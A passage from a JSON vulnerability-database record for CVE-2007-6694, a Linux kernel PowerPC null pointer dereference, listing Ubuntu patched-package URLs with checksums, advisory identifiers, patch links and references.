http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb\n      Size/MD5:   322560 63ec46beb37b44f7e901d4a17d4d5002\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-cell-di_2.6.22-15.39_powerpc.udeb\n      Size/MD5:   267156 690a55e73215d9bc450caa6b99fc4476\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc-di_2.6.22-15.39_powerpc.udeb\n      Size/MD5:   220186 7710f01beebe09e0c9bf2cb812991139\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb\n      Size/MD5:   267210 651e58dc6fce70139c603386c92ff3bb\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc-smp_2.6.22.4-15.11_powerpc.deb\n      Size/MD5:  1300508 45e687319d4e0d2dac393138e6f2d6c6\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc64-smp_2.6.22.4-15.11_powerpc.deb\n      Size/MD5:  1002304 9f77a9427eeaea48276c6b68547d824f\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc_2.6.22.4-15.11_powerpc.deb\n      Size/MD5:  1298454 fc0dcab1f9958209c7f4266bc08de844\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-firmware-2.6.22-15-powerpc-di_2.6.22.4-15.11_powerpc.udeb\n      Size/MD5:      764 d6233f778dcf936a4a0478aa80409d52\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-modules-2.6.22-15-powerpc-di_2.6.22.4-15.11_powerpc.udeb\n      Size/MD5:      734 8505f5c770efe7e12619fc324996c31a\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-sparc64-smp_2.6.22-15.16_sparc.deb\n      Size/MD5:     3802 e09e7173876354b9a1bb6846e9437b67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-sparc64_2.6.22-15.16_sparc.deb\n      Size/MD5:     3772 586b2c371ca1f45ea3513cfa459fa08a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-sparc64-di_2.6.22-15.16_sparc.udeb\n      Size/MD5:      646 049e8815ed4659bbd756521f44d1b957\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    59312 4c07f24b58ed97db0fb543db5a8d4856\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    68268 a62b0e675c367386a3208a198f127949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    42130 4b939c9f08fee124425bd784f7bf7d3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    95330 eb40ad8d594615e788ecf89c529c1561\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   594048 cd592a5479c6d7119a2eabe234aba28c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   169390 703d55b772601b01ef874202350a9549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    38254 691b333634c543721644e9126fb6f22e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    38648 3c0eca639d2d669846051bc7b3acc3db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   154606 57fb00f92f0dcc365e0c41540b5efc41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:  1993026 46125df549b3d01d4d8cc9b4356e9fb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-sparc64-smp_2.6.22-15.54_sparc.deb\n      Size/MD5:   475654 c92a5bb9e70c8af93c8ba14d222d2b54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-sparc64_2.6.22-15.54_sparc.deb\n      Size/MD5:   474486 2c0f22707763247036f715195ea32cb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-sparc64-smp_2.6.22-15.54_sparc.deb\n      Size/MD5: 12415598 f88ba6815bda87f9f6bab3b1f08f2c02\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-sparc64_2.6.22-15.54_sparc.deb\n      Size/MD5: 12179794 406b603b04315995ed3b535149d11ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_sparc.deb\n      Size/MD5:   684538 d20de9a13d35cd857709d8e97110d89a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   265810 e454ac8cfbb55798d897f6b8f915aaec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   159904 f25815be23aae799ff31fb30b0f660ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   247460 576ba769410c3856461f98143f89064a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:  1254066 0ae70dfca4fac5dc7187d025654c811c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   159996 f945e232f58c9a3c54ee4dc317c24005\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    91978 762357557c147272e8227fb1394886f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    40636 bc40eb4e9aaa6c4a798f93a58e4ea196\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    38574 da8bb028537d9379b91be3524de7cfdc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:     8646 ecd7b4d5a5cd5ab219902b3cf2f87227\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    60070 4adf7e7028b4fe0cef8a3f463b8c6ba4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    90990 a46723f940c9b17edd69478fba14a9ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   875908 833753a21da42ec786aaf013767c85e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:     9762 fa7c339472c4bdfda8b82021c0c45dbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:   369314 55df073f08fb5e80aa5f7211d3585417\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb\n      Size/MD5:    56888 eb89eaebdec3149988ab5fd1652a116c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64-smp_2.6.22-15.39_sparc.deb\n      Size/MD5:  2578980 89f82b147630b1a42234d7a7f428905f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64_2.6.22-15.39_sparc.deb\n      Size/MD5:  2568738 a4a1af735ea7160b6f47ef0c749689a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb\n      Size/MD5:  1048456 ee8f6d236b1ab8877f7fe255c748c082\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb\n      Size/MD5:   322536 7891ae3bb1a75ad4a68f895e3d8632d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb\n      Size/MD5:   227024 7a30e435d568400043ce19e83390e38b\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-sparc64-smp_2.6.22.4-15.11_sparc.deb\n      Size/MD5:  1002242 96e1f749c39577efa970f85dffb277a7\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-sparc64_2.6.22.4-15.11_sparc.deb\n      Size/MD5:  1002138 657b9f2f3b28d2585178c447c7e7745c\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "BID",
        "id": "27555"
      },
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "db": "PACKETSTORM",
        "id": "65965"
      },
      {
        "db": "PACKETSTORM",
        "id": "67518"
      },
      {
        "db": "PACKETSTORM",
        "id": "66960"
      }
    ],
    "trust": 2.25
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-30056",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-6694",
        "trust": 3.1
      },
      {
        "db": "BID",
        "id": "27555",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "28696",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "30018",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "30515",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "29058",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "30769",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "28748",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "29236",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2008-0380",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420",
        "trust": 0.7
      },
      {
        "db": "MLIST",
        "id": "[LINUX-KERNEL] 20071122 [PATCH] PPC: CHRP - FIX POSSIBLE NULL POINTER DEREFERENCE",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2008:0055",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2008:0154",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1565",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1504",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1503",
        "trust": 0.6
      },
      {
        "db": "UBUNTU",
        "id": "USN-618-1",
        "trust": 0.6
      },
      {
        "db": "UBUNTU",
        "id": "USN-614-1",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "66960",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "65965",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-30056",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "67518",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "db": "BID",
        "id": "27555"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "PACKETSTORM",
        "id": "65965"
      },
      {
        "db": "PACKETSTORM",
        "id": "67518"
      },
      {
        "db": "PACKETSTORM",
        "id": "66960"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "id": "VAR-200801-0578",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:12:55.057000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-8.16AX",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=115"
      },
      {
        "title": "kernel-2.6.18-53.11AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=215"
      },
      {
        "title": "ChangeLog-2.6.24",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.24"
      },
      {
        "title": "ChangeLog-2.4.37",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.4/changelog-2.4.37"
      },
      {
        "title": "RHSA-2008:0154",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2008-0154.html"
      },
      {
        "title": "RHSA-2008:0055",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2008-0055.html"
      },
      {
        "title": "RHSA-2008:0055",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2008-0055j.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.9
      },
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-noinfo",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/27555"
      },
      {
        "trust": 2.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2008-0055.html"
      },
      {
        "trust": 1.9,
        "url": "http://marc.info/?l=linux-kernel\u0026m=119576191029571\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=396751"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2008/dsa-1503"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2008/dsa-1504"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2008/dsa-1565"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2008-0154.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/28696"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/28748"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/29058"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/29236"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/30018"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/30515"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/30769"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-618-1"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2008/0380"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11215"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/614-1/"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2008/0380"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-6694"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-6694"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/28696/"
      },
      {
        "trust": 0.6,
        "url": "http://www.ubuntulinux.org/support/documentation/usn/usn-614-1"
      },
      {
        "trust": 0.3,
        "url": "http://www.linux.org/"
      },
      {
        "trust": 0.3,
        "url": "http://kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.37.log"
      },
      {
        "trust": 0.3,
        "url": "http://lists.debian.org/debian-security-announce/2008/msg00077.html"
      },
      {
        "trust": 0.3,
        "url": "https://lists.ubuntu.com/archives/ubuntu-security-announce/2008-june/000721.html"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2008-102.htm"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2008-0154.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6694"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1375"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0007"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1294"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1669"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=linux-kernel\u0026amp;m=119576191029571\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-18etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-18etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-18etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-18etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_amd64.deb"
      },
      {
        "trust": 0.1,
